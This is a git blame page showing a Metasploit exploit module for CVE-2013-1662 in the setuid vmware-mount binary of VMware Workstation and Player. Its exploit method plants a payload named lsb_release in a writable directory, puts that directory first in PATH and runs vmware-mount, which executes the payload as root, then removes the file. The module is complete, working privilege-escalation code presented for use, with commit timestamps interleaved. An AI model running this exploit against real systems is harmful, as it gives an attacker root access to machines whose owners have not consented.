Files
metasploit-gs/modules/exploits/linux/local/vmware_mount.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

91 lines
3.0 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Local
2017-05-03 11:12:55 -04:00
Rank = ExcellentRanking
2013-09-05 13:41:25 -05:00
include Msf::Exploit::EXE
include Msf::Post::File
2022-10-05 19:43:07 -04:00
def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
'Description' => %q{
VMWare Workstation (up to and including 9.0.2 build-1031769)
and Player have a setuid executable called vmware-mount that
invokes lsb_release in the PATH with popen(3). Since PATH is
user-controlled, and the default system shell on
Debian-derived distributions does not drop privs, we can put
an arbitrary payload in an executable called lsb_release and
have vmware-mount happily execute it as root for us.
},
'License' => MSF_LICENSE,
'Author' => [
2013-08-26 23:29:16 -05:00
'Tavis Ormandy', # Vulnerability discovery and PoC
'egypt' # Metasploit module
],
2022-10-05 19:43:07 -04:00
'Platform' => [ 'linux' ],
'Arch' => ARCH_X86,
'Targets' => [
[ 'Automatic', {} ],
],
2022-10-05 19:43:07 -04:00
'DefaultOptions' => {
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependFork' => true
},
'Privileged' => true,
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2013-1662' ],
[ 'OSVDB', '96588' ],
[ 'BID', '61966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
[ 'URL', 'https://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ],
[ 'URL', 'https://www.rapid7.com/blog/post/2013/09/05/cve-2013-1662-vmware-mount-exploit' ]
],
'DisclosureDate' => '2013-08-22',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
}
)
)
2018-10-10 14:12:29 +00:00
register_advanced_options [
2022-10-05 19:43:07 -04:00
OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
2018-10-10 14:12:29 +00:00
]
end
2022-10-08 09:16:57 -04:00
def vmware_mount
'/usr/bin/vmware-mount'
end
def check
2022-10-05 19:43:07 -04:00
return CheckCode::Safe("#{vmware_mount} file not found") unless file? vmware_mount
return CheckCode::Safe("#{vmware_mount} is not setuid") unless setuid? vmware_mount
CheckCode::Appears
end
def exploit
2014-11-26 16:53:30 +10:00
unless check == CheckCode::Appears
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
end
2018-10-10 14:35:34 +00:00
lsb_path = File.join(datastore['WritableDir'], 'lsb_release')
2014-11-27 21:38:50 +00:00
write_file(lsb_path, generate_payload_exe)
cmd_exec("chmod +x #{lsb_path}")
2022-10-08 09:16:57 -04:00
cmd_exec("PATH=#{datastore['WritableDir']}:$PATH #{vmware_mount}")
2013-08-28 12:42:26 -05:00
# Delete it here instead of using FileDropper because the original
# session can clean it up
2014-11-27 21:38:50 +00:00
cmd_exec("rm -f #{lsb_path}")
end
end